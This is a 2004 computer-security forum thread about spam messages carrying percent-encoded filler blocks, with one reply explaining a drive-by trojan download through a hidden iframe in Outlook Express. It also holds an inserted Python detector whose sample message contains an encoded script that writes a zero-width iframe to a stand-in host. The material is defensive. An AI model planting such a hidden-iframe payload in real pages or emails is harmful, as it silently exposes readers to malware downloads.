Yet another trojan?

Discussion in 'Computer Security' started by Jim Watt, Oct 3, 2004.

  1. Jim Watt

    Jim Watt Guest

    I've seen a number of messages looking like this, they just get
    deleted, but what exactly are they? Is this another attempt
    to execute code on MS Outluck?

    --------------------

    - Home directory: The location of the home directory varies by
    platform.
    Windows 98 (single-user): C:\Windows
    Windows 98 (multi-user): C:\Windows\Profiles
    Windows 2000/XP: C:\Documents and Settings




    -----BEGIN BLOCK-----
    F%D5%CDU%C2%058%E5%9A%D5%7D%85
    JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2

    etc ...
    --
    Jim Watt
    http://www.gibnet.com
     
    Jim Watt, Oct 3, 2004
    #1

  2. Jim Watt

    Ant Guest

    "Jim Watt" wrote...
    > I've seen a number of messages looking like this,


    So have I - since about the end of August.

    > they just get deleted, but what exactly are they?


    Just spammer nonsense, I think.

    > Is this another attempt to execute code on MS Outluck?


    The block displays as plain text. I can't make sense of it as
    executable code after escaping.

    I've seen examples of spam containing these blocks, which also contain
    an encoded javascript. This is the real exploit. It contains an iframe
    with a URL to a site hosting a trojan. The idea is that this gets
    silently downloaded and installed if you're unlucky enough to preview
    or open it with OE.

    Easy enough to avoid with the proper security settings. OE should be
    in the restricted zone, which should of course have scripting disabled.

    > - Home directory: The location of the home directory varies by
    > platform.
    > Windows 98 (single-user): C:\Windows
    > Windows 98 (multi-user): C:\Windows\Profiles
    > Windows 2000/XP: C:\Documents and Settings
    >
    > -----BEGIN BLOCK-----
    > F%D5%CDU%C2%058%E5%9A%D5%7D%85
    > JJ%E3%DF%D7o%C1%1F%60%EA%F0%B2
    >
    > etc ...
     
    Ant, Oct 3, 2004
    #2
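
The following Python example is added here and is not from any poster in the thread. It checks a message for the two things Ant's reply describes: a percent-encoded block that decodes to no markup, and a script that hides an iframe. It assumes the script carries the iframe in a percent-escaped string literal; the sample message and the example.invalid URL are constructed.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import unquote, unquote_to_bytes
# Constructed message; only the encoded block line is copied from the thread.
SAMPLE = """\
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain

-----BEGIN BLOCK-----
F%D5%CDU%C2%058%E5%9A%D5%7D%85
--b1
Content-Type: text/html

<script>document.write(unescape(
'%3Ciframe%20src%3D%22http%3A//example.invalid/x%22%20width%3D0%3E%3C/iframe%3E'))</script>
--b1--
"""

class TagFinder(HTMLParser):
    """Collect <script> bodies and the src attribute of every <iframe>."""
    def __init__(self, html):
        super().__init__()
        self.tag, self.scripts, self.iframes = None, [], []
        self.feed(html)
    def handle_starttag(self, tag, attrs):
        self.tag = tag
        if tag == "iframe":
            self.iframes.append(dict(attrs).get("src"))
    def handle_endtag(self, tag):
        self.tag = None
    def handle_data(self, data):
        if self.tag == "script":
            self.scripts.append(data)

def scan(raw):  # returns (kind, detail) findings for one raw RFC 822 message
    findings = []
    for part in message_from_string(raw).walk():
        ctype, body = part.get_content_type(), part.get_payload()
        if ctype == "text/html":
            page = TagFinder(body)
            findings += [("iframe", src) for src in page.iframes]
            for enc in re.findall(r"['\"]([^'\"]*%[0-9A-Fa-f]{2}[^'\"]*)['\"]", "".join(page.scripts)):
                findings += [("hidden-iframe", s) for s in TagFinder(unquote(enc)).iframes]
        elif ctype == "text/plain" and "-----BEGIN BLOCK-----" in body:
            decoded = unquote_to_bytes(body.partition("-----BEGIN BLOCK-----")[2])
            findings.append(("filler-block", "markup" if b"<" in decoded else "no markup"))
    return findings
```

Any `hidden-iframe` finding means the HTML part builds a frame at render time, which is the behaviour that disabling scripting in the restricted zone blocks.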

  3. Jim Watt

    Mark3324 Guest

    Googling the first line or first two lines gets quite a few hits. For
    example: http://www.dslreports.com/forum/remark,11298215~start=-1~mode=flat


    On Sun, 3 Oct 2004 12:48:48 -0400, Jim Watt wrote
    (in article <>):

    > I've seen a number of messages looking like this, they just get
    > deleted, but what exactly are they? Is this another attempt
    > to execute code on MS Outluck?
    >[snipped]
     
    Mark3324, Oct 4, 2004
    #3
  4. Jim Watt

    Ant Guest

    Ant, Oct 4, 2004
    #4
